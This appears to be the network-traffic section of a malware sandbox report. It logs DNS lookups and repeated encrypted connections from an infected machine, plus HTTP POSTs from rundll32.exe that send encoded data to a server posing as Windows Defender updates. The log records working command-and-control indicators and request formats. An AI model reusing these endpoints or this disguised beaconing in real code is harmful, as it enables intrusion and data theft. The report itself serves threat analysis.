                                              Dec 6, 2024 22:20:49.910649061 CET497984443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:50.030673027 CET444349798185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:51.372632027 CET444349798185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:51.375674009 CET497984443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:51.495774031 CET444349798185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:51.498246908 CET497984443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:51.516766071 CET498044443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:51.636672020 CET444349804185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:51.638108969 CET498044443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:51.639734983 CET498044443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:51.760059118 CET444349804185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:53.088341951 CET444349804185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:53.092422962 CET498044443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:53.212691069 CET444349804185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:53.216149092 CET498044443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:53.235147953 CET498064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:53.355134964 CET444349806185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:53.356126070 CET498064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:53.357587099 CET498064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:53.477384090 CET444349806185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:54.792453051 CET444349806185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:54.794163942 CET498064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:54.914712906 CET444349806185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:54.914777040 CET498064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:54.938388109 CET498114443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:55.062161922 CET444349811185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:55.062241077 CET498114443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:55.070889950 CET498114443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:55.193133116 CET444349811185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:56.693231106 CET444349811185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:56.694761992 CET498114443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:56.815988064 CET444349811185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:56.816049099 CET498114443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:56.828898907 CET498174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:56.948705912 CET444349817185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:56.948776960 CET498174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:56.950488091 CET498174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:57.070610046 CET444349817185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:58.448982000 CET444349817185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:58.454595089 CET498174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:58.575856924 CET444349817185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:58.575931072 CET498174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:58.657524109 CET498234443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:58.777307034 CET444349823185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:58.777410030 CET498234443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:58.778930902 CET498234443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:58.898807049 CET444349823185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:00.252599955 CET444349823185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:00.255707026 CET498234443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:00.376113892 CET444349823185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:00.376198053 CET498234443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:00.393682957 CET498294443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:00.513643026 CET444349829185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:00.513719082 CET498294443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:00.515227079 CET498294443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:00.634922981 CET444349829185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:02.166407108 CET444349829185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:02.167987108 CET498294443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:02.288784027 CET444349829185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:02.288851023 CET498294443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:02.314857006 CET498314443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:02.434815884 CET444349831185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:02.434900999 CET498314443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:02.437602997 CET498314443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:02.572604895 CET444349831185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:03.884746075 CET444349831185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:03.886313915 CET498314443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:04.006583929 CET444349831185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:04.006772041 CET498314443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:04.031152010 CET498364443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:04.150849104 CET444349836185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:04.150921106 CET498364443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:04.152476072 CET498364443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:04.272298098 CET444349836185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:05.618777037 CET444349836185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:05.620435953 CET498364443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:05.741549969 CET444349836185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:05.741667986 CET498364443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:05.751945972 CET498424443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:05.871850014 CET444349842185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:05.871944904 CET498424443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:05.900727034 CET498424443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:06.020469904 CET444349842185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:07.634815931 CET444349842185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:07.639791012 CET498424443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:07.760036945 CET444349842185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:07.760107040 CET498424443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:08.417458057 CET498484443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:08.537611961 CET444349848185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:08.537750006 CET498484443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:08.539426088 CET498484443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:08.659583092 CET444349848185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:09.995704889 CET444349848185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:09.997195005 CET498484443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:10.117300034 CET444349848185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:10.117389917 CET498484443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:10.141590118 CET498544443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:10.261884928 CET444349854185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:10.262367010 CET498544443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:10.263849974 CET498544443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:10.383691072 CET444349854185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:11.742902994 CET444349854185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:11.756736040 CET498544443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:11.878406048 CET444349854185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:11.878469944 CET498544443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:11.954480886 CET498604443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:12.074492931 CET444349860185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:12.074568033 CET498604443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:12.076178074 CET498604443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:12.197006941 CET444349860185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:13.572065115 CET444349860185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:13.574203968 CET498604443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:13.694546938 CET444349860185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:13.694627047 CET498604443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:13.719820023 CET498654443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:13.840487003 CET444349865185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:13.840612888 CET498654443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:13.842061996 CET498654443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:13.961968899 CET444349865185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:15.288995028 CET444349865185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:15.290591955 CET498654443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:15.411300898 CET444349865185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:15.411607981 CET498654443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:15.438673019 CET498664443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:15.558643103 CET444349866185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:15.558814049 CET498664443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:15.560359955 CET498664443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:15.680035114 CET444349866185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:17.269184113 CET444349866185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:17.270812988 CET498664443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:17.391169071 CET444349866185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:17.391274929 CET498664443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:17.405113935 CET498704443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:17.525042057 CET444349870185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:17.525127888 CET498704443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:17.526896954 CET498704443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:17.646753073 CET444349870185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:18.991676092 CET444349870185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:18.993776083 CET498704443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:19.115467072 CET444349870185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:19.115582943 CET498704443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:19.125973940 CET498764443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:19.249608994 CET444349876185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:19.249712944 CET498764443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:19.251430988 CET498764443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:19.371402025 CET444349876185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:20.714920044 CET444349876185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:20.738753080 CET498764443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:20.859235048 CET444349876185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:20.859858990 CET498764443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:20.917635918 CET498814443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:21.037678003 CET444349881185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:21.037838936 CET498814443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:21.039338112 CET498814443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:21.159568071 CET444349881185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:22.532628059 CET444349881185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:22.534370899 CET498814443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:22.656326056 CET444349881185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:22.656398058 CET498814443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:22.672977924 CET498854443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:22.792874098 CET444349885185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:22.793029070 CET498854443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:22.794574976 CET498854443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:22.915992022 CET444349885185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:24.372997046 CET444349885185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:24.377918959 CET498854443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:24.498192072 CET444349885185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:24.500183105 CET498854443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:24.513633013 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:24.633610010 CET444349891185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:24.634874105 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:24.636548042 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:24.756726027 CET444349891185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.069452047 CET444349891185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.071214914 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.192174911 CET444349891185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.192420959 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.295922041 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.416107893 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.416177988 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.417602062 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.537514925 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:27.990735054 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:27.993623018 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.115586996 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:28.116265059 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.123572111 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.246088028 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:28.246284008 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.247754097 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.369724989 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.766406059 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.768074036 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:29.888292074 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.888362885 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:29.917454958 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.039367914 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:30.039454937 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.041013956 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.160902977 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.503984928 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.505597115 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.627563000 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.627620935 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.646811962 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.766736984 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.766822100 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.768332005 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.888309956 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.298293114 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.300085068 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.420185089 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.420270920 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.439543962 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.560667992 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.560862064 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.562880039 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.682770014 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.027105093 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.028640985 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.148940086 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.149007082 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.173347950 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.293036938 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.293124914 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.294671059 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.415498018 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.738509893 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.740200043 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.860483885 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.860570908 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.876554012 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.996489048 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.996583939 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.998045921 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:37.118012905 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.590828896 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.595289946 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.715351105 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.715403080 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.735939980 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.855721951 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.855803967 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.857400894 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.977207899 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.273221970 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.273277044 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.273485899 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.285878897 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.285896063 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.296139956 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.301651955 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.424221992 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.428210974 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.436979055 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.556710005 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.557110071 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.558464050 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.678301096 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:44.831145048 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:44.831262112 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:45.104841948 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:45.109823942 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:45.234509945 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:45.234565973 CET499394443192.168.2.4185.234.216.175

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 6, 2024 22:19:35.483716965 CET5531553192.168.2.41.1.1.1
                                              Dec 6, 2024 22:19:35.625550032 CET53553151.1.1.1192.168.2.4
                                              Dec 6, 2024 22:19:39.979700089 CET5822153192.168.2.41.1.1.1
                                              Dec 6, 2024 22:19:40.118748903 CET53582211.1.1.1192.168.2.4
                                              Dec 6, 2024 22:20:04.463222980 CET6319353192.168.2.41.1.1.1
                                              Dec 6, 2024 22:20:04.602116108 CET53631931.1.1.1192.168.2.4
                                              Dec 6, 2024 22:21:07.772567987 CET5729853192.168.2.41.1.1.1
                                              Dec 6, 2024 22:21:08.400990963 CET53572981.1.1.1192.168.2.4
                                              Dec 6, 2024 22:21:43.129338026 CET5396453192.168.2.41.1.1.1
                                              Dec 6, 2024 22:21:43.267827034 CET53539641.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 6, 2024 22:19:35.483716965 CET192.168.2.41.1.1.10x2af3Standard query (0)axizlhop.lifeA (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:19:39.979700089 CET192.168.2.41.1.1.10x5aa8Standard query (0)security-patches.systemsA (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:20:04.463222980 CET192.168.2.41.1.1.10xae17Standard query (0)security-patches.systemsA (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:21:07.772567987 CET192.168.2.41.1.1.10x6476Standard query (0)security-patches.systemsA (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:21:43.129338026 CET192.168.2.41.1.1.10xdb6bStandard query (0)security-patches.systemsA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 6, 2024 22:19:35.625550032 CET1.1.1.1192.168.2.40x2af3No error (0)axizlhop.life104.21.40.3A (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:19:35.625550032 CET1.1.1.1192.168.2.40x2af3No error (0)axizlhop.life172.67.172.216A (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:19:40.118748903 CET1.1.1.1192.168.2.40x5aa8No error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:20:04.602116108 CET1.1.1.1192.168.2.40xae17No error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:21:08.400990963 CET1.1.1.1192.168.2.40x6476No error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false
                                              Dec 6, 2024 22:21:43.267827034 CET1.1.1.1192.168.2.40xdb6bNo error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • axizlhop.life
                                              • security-patches.systems

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449740185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:04.737658024 CET741OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 525
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 33 45 31 4b 32 78 43 52 6e 67 7a 5a 6d 70 42 50 54 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 61 57 67 30 52 58 5a 57 61 6c 4d 78 55 6b 55 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 58 4a 71 56 47 74 4b 54 54 67 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 6f 54 32 46 50 65 6d 52 52 50 53 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 [TRUNCATED]
                                              Data Ascii: data=eyJBbldGaCI6InN0V3E1K2xCRngzZmpBPT0iLCJGc3RMIjoicThyTjdwTXBCbktpaWg0RXZWalMxUkU9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMXJqVGtKTTgiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJoT2FPemRRPSIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
                                              Dec 6, 2024 22:20:06.201527119 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:05 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449741185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:06.365020990 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
